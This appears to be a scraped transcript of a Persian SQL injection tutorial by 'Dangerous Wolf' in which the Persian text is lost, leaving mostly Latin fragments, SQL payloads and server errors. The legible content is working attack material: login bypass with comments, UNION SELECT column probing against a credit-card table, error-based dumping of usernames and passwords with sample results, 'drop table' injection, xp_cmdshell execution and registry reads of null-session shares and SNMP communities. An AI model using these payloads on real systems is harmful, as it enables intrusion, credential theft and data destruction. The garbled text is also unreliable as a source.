SQL Injection Wolf

  • Published on
    11-Jun-2015

  • View
    390

  • Download
    7

Embed Size (px)

Transcript

<p> Structured Query Language Injection</p> <p>SQL Injection TutorialSecond ReleaseBy Dangerous Wolf</p> <p> : 0002 . 0002 . . 0202 . . . ) ( Tutorial SQL Injection . 003 . 001 . . 01 SQL Injection . . Injection . : "James Marshall The top admin of "Astalavista Security Committee Adrian Lamo "H4G1S Destroying Group" Became WhiteHat "Zinho The top admin of "Hackers Center Committee "Steve Example Gold Member of "Unix Wizard "IDESpinner The top admin of "Cracking Is Life cracking- Team Ali Rashidi The top admin of "Crouz Security Team</p> <p>77 Page 1 of</p> <p>) ( SQL Injection Tutorial by Dangerous Wolf</p> <p> 1: Web Application Dynamic Content windowing . . Platform ) SQL (Web Data Store Web Application (front-end-scripts) front-end SQL Query . web application hijacking . Query front-end scripts application . SQL Injection ! Database . Database Servers . ) (CC Info . Microsoft SQL MSSQL ) result ( (Oracle DB Servers) Oracle . MSSQL ) (Market Oracle !! Oracle . )!!( bug !</p> <p>77 Page 2 of</p> <p>) ( SQL Injection Tutorial by Dangerous Wolf</p> <p> 2: SQL Injection . . application ) ( ) ( SQL .</p> <p> . Web Application . Web Server ) ! (exception exception '500: Internal Server 'Error SQL syntax ) : quote ( application . exception . text HTML replace. / . redirect . (application code) application . Application . )002( redirect Internal Server Error replace. : application A B . application proddetails.asp . ProdID . ) (returned . application proddetails.asp ProdID valid. Application A . ProdID ID insert recordset .77 Page 3 of ) ( SQL Injection Tutorial by Dangerous Wolf</p> <p> Application A recordset exception ' '500: Internal Server Error . Application B recordset 0 . ' 'No such Product . . SQL Injection . invalid application )!!!( SQL .</p> <p> Application . SQL Injection : SQL SQL Keyword : OR, AND ... . META Character ; ' !! . Intercepting Proxy redirect . . SQL Injection. valid . injection . . SQL Injection exploit. SQL . pick of litter )!!!( SQL Injection .</p> <p> SQL Injection SQL . SQL Number String Date . Injection . web application SQL Query )' 'abc String 4 number string (. SQL quote . : 4 = SELECT * FROM Products WHERE ProdID</p> <p>77 Page 4 of</p> <p>) ( SQL Injection Tutorial by Dangerous Wolf</p> <p> 'SELECT * FROM Products WHERE ProdName = 'Book SQL Server . SQL . Basic Arithmetic Operation . : 4=/myecommercesite/proddetails.asp?ProdID SQL Injection . '4 . 1 + 3 . SQL . SQL : '4 = (1) SELECT * FROM Products WHERE ProdID 1 + 3 = (2) SELECT * FROM Products WHERE ProdID SQL . ) ProdID 4( SQL Injection . SQL SQL Syntax String Expression . . quote breaking out quote . SQL Server ) (concatenation . Microsoft SQL Server + Oracle || . . : /myecommercesite/proddetails.asp?ProdName=Book SQL Injection ProdName . ' B B' + 'ook ) B' || 'ook .(Oracle : ''(1) SELECT * FROM Products WHERE ProdName = 'Book '(2) SELECT * FROM Products WHERE ProdID = 'B' + 'ook SQL ) (book Book. . ) sysdate Oracle SQL Server )( getdate (. SQL </p> <p>77 Page 5 of</p> <p>) ( SQL Injection Tutorial by Dangerous Wolf</p> <p> SQL Injection .</p> <p> . syntax .</p> <p> Syntax SQL ) (Blindfolded . . . . SELECT WHERE WHERE . WHERE )( . application 1=1 OR . . . application SQL ) : 1=1 OR 0001 application (. WHERE ,OR AND . : '2=1 'AND . '2=1 'OR .Operator Precedence WHERE . UNION SELECT WHERE . SQL . . 2=1 AND, OR 1=1 SQL . )--( SQL Server ) .(Ignore User Name Password . : SELECT Username, UserID, Password FROM Users WHERE Username = user AND Password = pass --' johndoe ) (User WHERE : WHERE Username = johndoe --'AND Password = pass</p> <p>77 Page 6 of</p> <p>) ( SQL Injection Tutorial by Dangerous Wolf</p> <p> ) .(bypass WHERE : )WHERE (Username = user AND Password = pass . )-- ' (jonhdoe : )WHERE (Username = johndoe' --' AND Password = pass . . ) (comment . .</p> <p> SQL . ) ( . . Oracle Microsoft SQL Server . . . WHERE . : 'AND 'xxx' = 'x' + 'xx + || Oracle MS SQL . ; . SQL ; SQL . SQL Injection Driver Oracle ; . comment ) ( ; MS SQL Oracle . ; COMMIT ) : -- .(xxx' : COMMIT . . ) :</p> <p>)( getdate MS SQL sysdate Oracle</p> <p>77 Page 7 of</p> <p>) ( SQL Injection Tutorial by Dangerous Wolf</p> <p> . SQL Injection . UNION SELECT .</p> <p> UNION SELECT SELECT WHERE application . UNION SELECT . WHERE UNION SELECT . UNION SELECT . . . . UNION SELECT UNION ) (. UNION SELECT . UNION SELECT . .</p> <p> UNION SELECT SQL Injection . UNION SELECT ) (. Column Number Mismatch Column Type Mismatch . . . ORDER BY . ORDER BY SELECT record-set . sort . ** . - 11223344) ORDER BY CCNum :SELECT CCNum FROM CreditCards - WHERE (AccNum=11223344) ORDER BY CCNumAND CardState=Active) AND UserName=johndoe</p> <p>77 Page 8 of</p> <p>) ( SQL Injection Tutorial by Dangerous Wolf</p> <p> ORDER BY . . 1 11223344) ORDER BY . CCNum . -- 2 11223344) ORDER BY . ORDER BY . 1 ORDER BY . SELECT . . ) sort application. ASC DESC (. ORDERY BY 1 001 ) 0001 (. . . . ) . (. .</p> <p> . . . Brute Force . . : : 01 013 ) 00006 ( . 02 1 . . NULL Keyword SQL . ) ( NULL . UNION SELECT NULL . : SELECT CCNum,CCType,CCExp,CCName FROM CreditCards )WHERE (AccNum=11223344 AND CardState=Active AND UserName=johndoe</p> <p>77 Page 9 of</p> <p>) ( SQL Injection Tutorial by Dangerous Wolf</p> <p> CCNum . . ) 4 ( UNION NULL FROM Permission Error ) ) (Permission Issues handle (. MS SQL FROM . Oracle DUAL . WHERE ) : 2=1 (WHERE record-set ) (NULL ) application NULL (. MS SQL Server Oracle : 2=1 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE : SELECT CCNum,CCType,CCExp,CCName FROM CreditCards WHERE (AccNum=11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 --AND CardState=Active) AND UserName=johndoe NULL . UNION . UNION . UNION 001 ) - ) (Vendor-Specific Table Name .(FROM UNION NULL . ) (iteration . . . CCNum UNION : 2=1 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE.No Error - Syntax is right. MS SQL Server Used. Proceeding 2=1 11223344) UNION SELECT 1,NULL,NULL,NULL WHERE.No Error First column is an integer 2=1 11223344) UNION SELECT 1,2,NULL,NULL WHERE.Error! Second column is not an integer 2=1 11223344) UNION SELECT 1,2,NULL,NULL WHERE.No Error Second column is a string 2=1 11223344) UNION SELECT 1,2,3,NULL WHERE.Error! Third column is not an integer 2=1 11223344) UNION SELECT 1,2,3,NULL WHERE.No Error Third column is a string 2=1 11223344) UNION SELECT 1,2,3,4 WHERE.Error! Fourth column is not an integer 2=1 11223344) UNION SELECT 1,2,3,4 WHERE77 Page 10 of ) ( SQL Injection Tutorial by Dangerous Wolf</p> <p>.No Error Fourth column is a string UNION . . . ) ( .</p> <p>77 Page 11 of</p> <p>) ( SQL Injection Tutorial by Dangerous Wolf</p> <p> 3: SQL Injection : 1. 08 )(HTTP 2. 4341 )(MS SQL</p> <p> : 08 :HTTP web . Web Designer . Query String . query ASP. browser . IE Netscape . Login Login Page ) iranbin.com 72/6/3831(: :login.htm &gt;"Login Page' 'a user name ' 'a integer : '70Microsoft OLE DB Provider for ODBC Drivers error '80040e [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value .'admin' to a column of data type int 53 /process_login.asp, line ' 'admin . user name ' 'where : -'Username: ' union select min(username),1,1,1 from users where username &gt; 'admin : '70Microsoft OLE DB Provider for ODBC Drivers error '80040e</p> <p>77 Page 28 of</p> <p>) ( SQL Injection Tutorial by Dangerous Wolf</p> <p>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'chris' to a column of data type int. /process_login.asp, line 35 : password user name Username: ' union select password,1,1,1 from users where username = 'admin'-: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'r00tr0x!' to a column of data type int. /process_login.asp, line 35 single string password user name Transact-SQL Statement .. integer . string : begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username&gt;@ret select @ret as ret into foo end :(' ) username' Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username&gt;@ret select @ret as ret into foo end string ' ret' ' foo' . : sample Username: ' union select ret,1,1,1 from foo-: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int. /process_login.asp, line 35 : drop Username: '; drop table foo--</p> <p>Page 29 of 77</p> <p>( SQL Injection Tutorial by Dangerous Wolf )</p> <p> . ). (rich error info .</p> <p> . : 1- SQL Server . 2- Registry Keys SAM ) SQL Server Local System Account (. 3- . 4- . 5- .SQL Server 6- bulk insert . 7- bcp text file . 8- sp_OACreate, sp_OAMethod sp_OAGetProperty (Active X) Ole Automation ASP . . . SQL Server SQL Injection. ) (: ]:[xp_cmdshell Extended Stored Proceudre DLL Dynamic Link Library Compile SQL Server . Application SQL Server ++ C/C . extended stored procedures SQL Server Built-In Registry . xp_cmdshell extended stored procedures Built-In . : SQL Server : 'exec master_xp_cmdshell 'dir</p> <p>77 Page 30 of</p> <p>) ( SQL Injection Tutorial by Dangerous Wolf</p> <p> SQL Server ) (LOCAL SYSTEM ACCOUNT ) (DOMAIN USER ACCOUNT . ]:[xp_regread BUILT-IN extended stored procedures xp_regXXX. : xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite . Share NULL-SESSION :,'exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters ''nullsessionshares</p> <p> Community SNMP Configure . Community SNMP host ) (Shared Area Reconfigure :'exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities</p> <p>...</p>